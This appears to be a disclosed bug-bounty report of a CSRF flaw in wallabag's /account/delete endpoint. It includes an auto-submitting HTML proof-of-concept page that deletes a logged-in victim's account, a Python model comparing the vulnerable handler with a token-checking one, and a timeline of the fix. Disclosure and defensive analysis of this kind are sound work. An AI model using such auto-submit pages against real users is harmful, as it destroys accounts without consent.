CSRF leading to delete account in wallabag/wallabag

Valid

Reported on

Jan 4th 2023


Description

wallabag was found to contain a Cross-Site Request Forgery (CSRF) weakness on /account/delete: the endpoint deletes the logged-in user's account on a plain GET request with no CSRF token, so any web page a logged-in user visits can trigger the deletion of that user's account.

Proof of Concept

  1. Create a new user.
  2. Log in as the new user.
  3. While still logged in, open the following HTML file in the browser. The form has no method attribute, so the browser submits it as a GET to /account/delete, and the request carries the victim's session cookie:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <!-- No method attribute: the browser sends a GET, and no CSRF token is included -->
    <form action="http://localhost:8000/account/delete">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
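The following Python model is an added illustration and not wallabag's own code (wallabag is a PHP/Symfony application and its real controller and fix look different). The Request, Session and handler shapes, the attacker origin and the token field name are constructed for the model. It replays the PoC above against a handler that behaves like the report describes, and against a hardened handler that requires a POST carrying a session-bound token:

```python
"""Model of the CSRF weakness shown in the PoC above and of a hardened handler.

Added example, not wallabag's own code: wallabag is a PHP/Symfony
application and its real controller and fix look different. The Request,
Session and handler shapes here are constructed for illustration only.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set, Tuple

# Origin of the target instance, taken from the PoC form action on this page.
SITE_ORIGIN = "http://localhost:8000"


@dataclass
class Session:
    """Cookie-backed session; the browser attaches it to every request to
    SITE_ORIGIN, including requests a third-party page makes it send."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str
    path: str
    session: Optional[Session]              # None when no session cookie was sent
    form: Dict[str, str] = field(default_factory=dict)
    origin: Optional[str] = None            # constructed stand-in for the Origin header


def vulnerable_delete_account(req: Request, users: Set[str]) -> Tuple[int, str]:
    """Deletes the account of whoever is logged in, on any method and with no
    token. A cross-site form with no method attribute submits as a GET, and
    this handler accepts it: that is the weakness the report describes."""
    if req.path != "/account/delete" or req.session is None:
        return 403, "unauthenticated"
    users.discard(req.session.user)
    return 302, "deleted"


def hardened_delete_account(req: Request, users: Set[str]) -> Tuple[int, str]:
    """Same action, but only for a POST that carries a token bound to the
    session and, when the browser supplied an Origin, one matching the site.
    A page on another origin cannot read the victim's token, so it fails."""
    if req.path != "/account/delete" or req.session is None:
        return 403, "unauthenticated"
    if req.method != "POST":
        return 405, "method not allowed"          # GET navigations never delete
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return 403, "cross-site origin"           # defence in depth
    supplied = req.form.get("_csrf_token", "")
    # Constant-time comparison; differing lengths simply compare unequal.
    if not hmac.compare_digest(supplied.encode(), req.session.csrf_token.encode()):
        return 403, "bad csrf token"
    users.discard(req.session.user)
    return 302, "deleted"


def replay_poc(handler) -> Tuple[int, bool]:
    """Replays the PoC: the victim is logged in, an attacker page submits a
    form (no method, so GET) to /account/delete. Returns the status and
    whether the victim's account still exists afterwards."""
    users = {"victim"}
    victim = Session(user="victim")
    req = Request("GET", "/account/delete", victim, origin="http://attacker.example")
    status, _ = handler(req, users)
    return status, "victim" in users


def cross_site_post_with_guessed_token(handler) -> Tuple[int, bool]:
    """A cross-site POST guessing the token. Origin is left unset so the
    token check alone has to stop it."""
    users = {"victim"}
    victim = Session(user="victim")
    req = Request("POST", "/account/delete", victim,
                  form={"_csrf_token": "0" * 64}, origin=None)
    status, _ = handler(req, users)
    return status, "victim" in users


def legitimate_delete(handler) -> Tuple[int, bool]:
    """The user's own delete button: a same-origin POST carrying the token."""
    users = {"victim"}
    victim = Session(user="victim")
    req = Request("POST", "/account/delete", victim,
                  form={"_csrf_token": victim.csrf_token}, origin=SITE_ORIGIN)
    status, _ = handler(req, users)
    return status, "victim" in users


if __name__ == "__main__":
    for name, handler in [("vulnerable", vulnerable_delete_account),
                          ("hardened", hardened_delete_account)]:
        print(name, "poc:", replay_poc(handler),
              "guessed token:", cross_site_post_with_guessed_token(handler),
              "legitimate:", legitimate_delete(handler))
```

Two details of the hardened handler matter in practice: the token must be tied to the session (a random value the attacker's page cannot read or derive) and compared in constant time, and refusing GET is not optional, because a top-level GET navigation still carries session cookies even under a SameSite=Lax cookie default. The Origin comparison is defence in depth only, since not every request carries that header.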

Impact

An attacker who lures a logged-in wallabag user to a page containing this form deletes that user's account without their knowledge or consent. Because the deletion is triggered by a plain top-level GET navigation, browsers that default session cookies to SameSite=Lax still attach the cookie, so that default does not mitigate this case.

We are processing your report and will contact the wallabag team within 24 hours. 3 months ago
We have contacted a member of the wallabag team and are waiting to hear back 3 months ago
Jérémy Benoist validated this vulnerability a month ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jérémy Benoist marked this as fixed in 2.5.4 with commit 268372 a month ago
Jérémy Benoist has been awarded the fix bounty
This vulnerability has been assigned a CVE
Jérémy Benoist published this vulnerability a month ago
wallabag/wallabag maintainer gave praise a month ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1